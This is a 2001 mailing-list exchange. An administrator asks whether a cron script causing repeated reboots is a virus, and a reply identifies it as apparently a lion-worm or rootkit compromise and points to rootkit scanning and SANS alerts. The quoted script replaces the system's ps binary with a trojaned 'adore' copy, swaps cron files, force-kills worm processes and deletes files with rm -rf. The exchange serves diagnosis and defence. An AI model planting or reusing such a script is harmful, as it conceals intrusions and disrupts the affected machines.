[Mailman-Users] What is ADORE

Steve Pirk orion at deathcon.com
Mon Apr 23 22:50:14 CEST 2001 

I would say that you box has been hacked. Most likely with
a variation of the l10n (lion) worm. I would pull it
off the network and run a rootkit scan on it.

Check out http://www.sans.org/ for info. Look at the 
Alerts and Analysis section.

The script that is running looks like it is "cleaning up" the
hackers code that is running on your box...

Anyone else have any input?

Steve
--
Steve Pirk
orion at deathcon.com . deathcon.com . pirk.com . webops.com . t2servers.com 

On Mon, 23 Apr 2001 MikeT at scitechsoft.com wrote:

> Is this a virus?
> Is this `below' the correct anacron file.
> 
> Help???
> 
> Thanks
> miket
> 
> I am experiencing some troble with or list server.  It is rebooting every five minutes 
> or so.  I have tracked it down to the anacron service and /etc/cron.daily/0anacron
> 
> #!/bin/sh
> if [ -f /sbin/reboot ]; then
> mv /usr/bin/adore /bin/ps
> mv /usr/lib/lib/0anacron-bak /etc/cron.daily/0anacron
> rm -rf /usr/lib/lib
> /sbin/reboot
> exit 0
> fi
> killall -9 lpd >>/dev/null 2>>/dev/null 3>>/dev/null
> killall -9 lpd7.sh >>/dev/null 2>>/dev/null 3>>/dev/null
> killall -9 start-lprng >>/dev/null 2>>/dev/null 3>>/dev/null
> killall -9 bind >>/dev/null 2>>/dev/null 3>>/dev/null
> killall -9 statdx >>/dev/null 2>>/dev/null 3>>/dev/null
> killall -9 start-statd >>/dev/null 2>>/dev/null 3>>/dev/null
> killall -9 start-wu26 >>/dev/null 2>>/dev/null 3>>/dev/null
> killall -9 start-bind >>/dev/null 2>>/dev/null 3>>/dev/null
> killall -9 pscan-bind >>/dev/null 2>>/dev/null 3>>/dev/null
> killall -9 pscan-ftpd >>/dev/null 2>>/dev/null 3>>/dev/null
> killall -9 pscan-lprng >>/dev/null 2>>/dev/null 3>>/dev/null
> killall -9 pscan-statdx >>/dev/null 2>>/dev/null 3>>/dev/null
> killall -9 wuftpd26 >>/dev/null 2>>/dev/null 3>>/dev/null
> killall -9 wuscan >>/dev/null 2>>/dev/null 3>>/dev/null
> killall -9 hackwu26 >>/dev/null 2>>/dev/null 3>>/dev/null
> killall -9 hacklpd >>/dev/null 2>>/dev/null 3>>/dev/null
> killall -9 scan.pl >>/dev/null 2>>/dev/null 3>>/dev/null
> killall -9 .bla >>/dev/null 2>>/dev/null 3>>/dev/null
> killall -9 xargs >>/dev/null 2>>/dev/null 3>>/dev/null
> killall -9 cat >>/dev/null 2>>/dev/null 3>>/dev/null
> mv /usr/bin/adore /bin/ps
> mv /usr/lib/lib/0anacron-bak /etc/cron.daily/0anacron
> rm -rf /usr/lib/lib
> 
> 
> 
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>      SciTech Software, Inc.
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> Michael E. Todd 
> Chico, CA  95928
> 530-894-8400 #151
>

More information about the Mailman-Users mailing list